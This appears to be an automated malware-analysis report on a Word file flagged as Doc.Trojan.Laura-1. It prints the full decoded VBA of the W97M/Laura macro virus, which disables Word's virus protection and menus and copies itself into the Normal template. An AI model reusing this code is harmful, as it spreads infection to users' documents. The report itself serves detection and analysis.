MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to modify application settings and displays a message box with the text 'Laura, I love you.' The heuristic 'ClamAV: Doc.Trojan.Laura-1' and the presence of 'Total Konfuzion' in the document body and script strongly suggest the 'Laura' family. The macro also checks and potentially modifies a registry key related to virus protection.
Heuristics 3
-
ClamAV: Doc.Trojan.Laura-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Laura-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2711 bytes |
SHA-256: de7377cdea32dae3c957ec83ede6d76787d5e6192a2b8592a172269846f1bf73 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Laura()
t = "W97M/Laura"
l = " Laura, I love you. "
m = " -Total Konfuzion-"
If Day(17) Then
MsgBox l & vbCr & vbCr & m, vbSystemModal, t
ActiveDocument.Shapes.AddTextEffect(msoTextEffect8, "Laura, I love you.", "Comic Sans MS", 36#, msoFalse, msoFalse, 155.6, 176.6).Select
CommandBars("WordArt").Visible = (Rnd * 0)
Beep
End If
End Sub
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
t = "W97M/Laura"
l = "Laura, I love you."
With Options
.VirusProtection = (Rnd * 0)
.SaveNormalPrompt = (Rnd * 0)
.ConfirmConversions = (Rnd * 0)
.SavePropertiesPrompt = (Rnd * 0)
End With
With Application
.EnableCancelKey = wdCancelDisabled
.UserName = "Total Konfuzion"
.UserInitials = "TK"
.UserAddress = t & vbCr & l
End With
CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
CommandBars("Tools").Controls("Templates and Add-ins...") = (Rnd * 0)
CommandBars("Format").Controls("Style Gallery...") = (Rnd * 0)
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Total Konfuzion"
.Subject = "W97M/Laura"
.Comments = "Laura, I love you"
.Keywords = "-Total Konfuzion-"
.Execute
End With
StatusBar = l
If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Set d = i.VBProject.VBComponents.Item(1).CodeModule
d.DeleteLines 1, d.CountOfLines
d.AddFromString Vx
Call Laura
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
' W97M/Laura
' by: Total Konfuzion
' Just to express my true love
' for you darling.. xxx
End Sub
Sub HelpAbout()
t = "W97M/Laura"
m = " -Total Konfuzion-"
Application.Caption = t & " - " & "Laura, I love you."
MsgBox " " & t & vbCr & vbCr & m, vbSystemModal, t
Dialogs(wdDialogHelpAbout).Show
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.